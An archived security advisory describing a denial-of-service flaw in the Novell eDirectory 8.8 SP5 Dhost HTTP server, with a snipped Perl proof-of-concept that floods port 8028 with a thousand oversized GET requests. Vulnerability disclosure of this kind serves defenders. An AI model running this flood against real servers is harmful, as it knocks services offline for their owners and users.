Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Networks :: bt-21612.htm

Novell eDirectory 8.8 SP5 Dhost Http Server DoS



Novell eDirectory 8.8 SP5 Dhost Http Server DoS
Novell eDirectory 8.8 SP5 Dhost Http Server DoS



Affected Software:=0D
Novell eDirectory 8.8 SP5=0D
=0D
Vulnerability Description:=0D
Novell eDirectory 8.8 SP5 is vulnerable to a denial of service attack.=0D
If a remote attacker sends Unicode strings with Http Request to "8028 port" =0D
("8028" is the default port of Novell eDirectory Dhost Http Server), =0D
the attacker can cause the system to consume 100% of the CPU resources.=0D
=0D
Credits to:=0D
Hellcode Research=0D
=0D
Original Advisory: =0D
http://tcc.hellcode.net/advisories/hellcode-adv003.txt=0D 
=0D
Exploit:=0D
=0D
	- snip-=0D
....=0D
=0D
$data = "?" x 500000;=0D
=0D
for($i= 0; $i < 1000; $i++)=0D
{=0D
	$sock= new IO::Socket::INET( PeerAddr => "localhost",=0D
	PeerPort => 8028,=0D
=0D
	Proto => 'tcp',=0D
	Type => SOCK_STREAM, =0D
=0D
	);=0D
	=0D
	print $sock "GET /$data HTTP/1.0\r\n\r\n";=0D
	=0D
	close($sock);=0D
}=0D
=0D
...=0D
	- snip -=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH